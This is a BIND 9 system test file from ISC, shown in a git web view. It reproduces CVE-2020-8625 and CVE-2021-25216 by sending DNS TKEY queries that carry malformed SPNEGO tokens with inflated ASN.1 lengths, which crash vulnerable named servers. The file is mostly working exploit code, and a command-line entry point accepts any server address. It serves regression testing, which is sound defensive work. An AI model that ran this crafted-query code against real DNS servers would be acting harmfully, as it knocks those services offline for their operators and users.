summaryrefslogtreecommitdiffstats
path: root/bin/tests/system/tsiggss/tests_isc_spnego_flaws.py
blob: 6340b5abf88f8e448376aa599e985d4ac32bc8cd (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
#!/usr/bin/python
############################################################################
# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
#
# SPDX-License-Identifier: MPL-2.0
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, you can obtain one at https://mozilla.org/MPL/2.0/.
#
# See the COPYRIGHT file distributed with this work for additional
# information regarding copyright ownership.
############################################################################

"""
A tool for reproducing ISC SPNEGO vulnerabilities
"""

import argparse
import datetime
import struct
import time

import pytest

pytest.importorskip("dns")
import dns.message
import dns.name
import dns.query
import dns.rdata
import dns.rdataclass
import dns.rdatatype
import dns.rrset


class CraftedTKEYQuery:
    # pylint: disable=too-few-public-methods

    """
    A class for preparing crafted TKEY queries
    """

    def __init__(self, opts: argparse.Namespace) -> None:
        # Prepare crafted key data
        tkey_data = ASN1Encoder(opts).get_tkey_data()
        # Prepare TKEY RDATA containing crafted key data
        rdata = dns.rdata.GenericRdata(
            dns.rdataclass.ANY, dns.rdatatype.TKEY, self._get_tkey_rdata(tkey_data)
        )
        # Prepare TKEY RRset with crafted RDATA (for the ADDITIONAL section)
        rrset = dns.rrset.from_rdata(dns.name.root, dns.rdatatype.TKEY, rdata)

        # Prepare complete TKEY query to send
        self.msg = dns.message.make_query(
            dns.name.root, dns.rdatatype.TKEY, dns.rdataclass.ANY
        )
        self.msg.additional.append(rrset)

    def _get_tkey_rdata(self, tkey_data: bytes) -> bytes:
        """
        Return the RDATA to be used for the TKEY RRset sent in the ADDITIONAL
        section
        """
        tkey_rdata = dns.name.from_text("gss-tsig.").to_wire()  # domain
        if not tkey_rdata:
            return b""
        tkey_rdata += struct.pack(">I", int(time.time()) - 3600)  # inception
        tkey_rdata += struct.pack(">I", int(time.time()) + 86400)  # expiration
        tkey_rdata += struct.pack(">H", 3)  # mode
        tkey_rdata += struct.pack(">H", 0)  # error
        tkey_rdata += self._with_len(tkey_data)  # key
        tkey_rdata += struct.pack(">H", 0)  # other size
        return tkey_rdata

    def _with_len(self, data: bytes) -> bytes:
        """
        Return 'data' with its length prepended as a 16-bit big-endian integer
        """
        return struct.pack(">H", len(data)) + data


class ASN1Encoder:
    # pylint: disable=too-few-public-methods

    """
    A custom ASN1 encoder which allows preparing malformed GSSAPI tokens
    """

    SPNEGO_OID = b"\x06\x06\x2b\x06\x01\x05\x05\x02"

    def __init__(self, opts: argparse.Namespace) -> None:
        self._real_oid_length = opts.real_oid_length
        self._extra_oid_length = opts.extra_oid_length

    # The TKEY RR being sent contains an encoded negTokenInit SPNEGO message.
    # RFC 4178 section 4.2 specifies how such a message is constructed.

    def get_tkey_data(self) -> bytes:
        """
        Return the key data field of the TKEY RR to be sent
        """
        return self._asn1(
            data_id=b"\x60", data=self.SPNEGO_OID + self._get_negtokeninit()
        )

    def _get_negtokeninit(self) -> bytes:
        """
        Return the ASN.1 DER-encoded form of the negTokenInit message to send
        """
        return self._asn1(
            data_id=b"\xa0",
            data=self._asn1(
                data_id=b"\x30",
                data=self._get_mechtypelist(),
                extra_length=self._extra_oid_length,
            ),
            extra_length=self._extra_oid_length,
        )

    def _get_mechtypelist(self) -> bytes:
        """
        Return the ASN.1 DER-encoded form of the MechTypeList to send
        """
        return self._asn1(
            data_id=b"\xa0",
            data=self._asn1(
                data_id=b"\x30",
                data=self._get_mechtype(),
                extra_length=self._extra_oid_length,
            ),
            extra_length=self._extra_oid_length,
        )

    def _get_mechtype(self) -> bytes:
        """
        Return the ASN.1 DER-encoded form of a bogus security mechanism OID
        which consists of 'self._real_oid_length' 0x01 bytes
        """
        return self._asn1(
            data_id=b"\x06",
            data=b"\x01" * self._real_oid_length,
            extra_length=self._extra_oid_length,
        )

    def _asn1(self, data_id: bytes, data: bytes, extra_length: int = 0) -> bytes:
        """
        Return the ASN.1 DER-encoded form of 'data' to be included in GSSAPI
        key data, designated with 'data_id' as the content identifier.  Setting
        'extra_length' to a positive integer allows data length indicated in
        the ASN.1 DER representation of 'data' to be increased beyond its
        actual size.
        """
        data_len = struct.pack(">I", len(data) + extra_length)
        return data_id + b"\x84" + data_len + data


def parse_options() -> argparse.Namespace:
    """
    Parse command line options
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--server-ip", required=True)
    parser.add_argument("--server-port", type=int, default=53)
    parser.add_argument("--real-oid-length", type=int, default=1)
    parser.add_argument("--extra-oid-length", type=int, default=0)

    return parser.parse_args()


def send_crafted_tkey_query(opts: argparse.Namespace) -> None:
    """
    Script entry point
    """

    query = CraftedTKEYQuery(opts).msg
    print("# > " + str(datetime.datetime.now()))
    print(query.to_text())
    print()

    response = dns.query.tcp(query, opts.server_ip, timeout=2, port=opts.server_port)
    print("# < " + str(datetime.datetime.now()))
    print(response.to_text())
    print()


def test_cve_2020_8625(named_port):
    """
    Reproducer for CVE-2020-8625.  When run for an affected BIND 9 version,
    send_crafted_tkey_query() will raise a network-related exception due to
    named (ns1) becoming unavailable after crashing.
    """
    for i in range(0, 50):
        opts = argparse.Namespace(
            server_ip="10.53.0.1",
            server_port=named_port,
            real_oid_length=i,
            extra_oid_length=0,
        )
        send_crafted_tkey_query(opts)


def test_cve_2021_25216(named_port):
    """
    Reproducer for CVE-2021-25216.  When run for an affected BIND 9 version,
    send_crafted_tkey_query() will raise a network-related exception due to
    named (ns1) becoming unavailable after crashing.
    """
    opts = argparse.Namespace(
        server_ip="10.53.0.1",
        server_port=named_port,
        real_oid_length=1,
        extra_oid_length=1073741824,
    )
    send_crafted_tkey_query(opts)


if __name__ == "__main__":
    cli_opts = parse_options()
    send_crafted_tkey_query(cli_opts)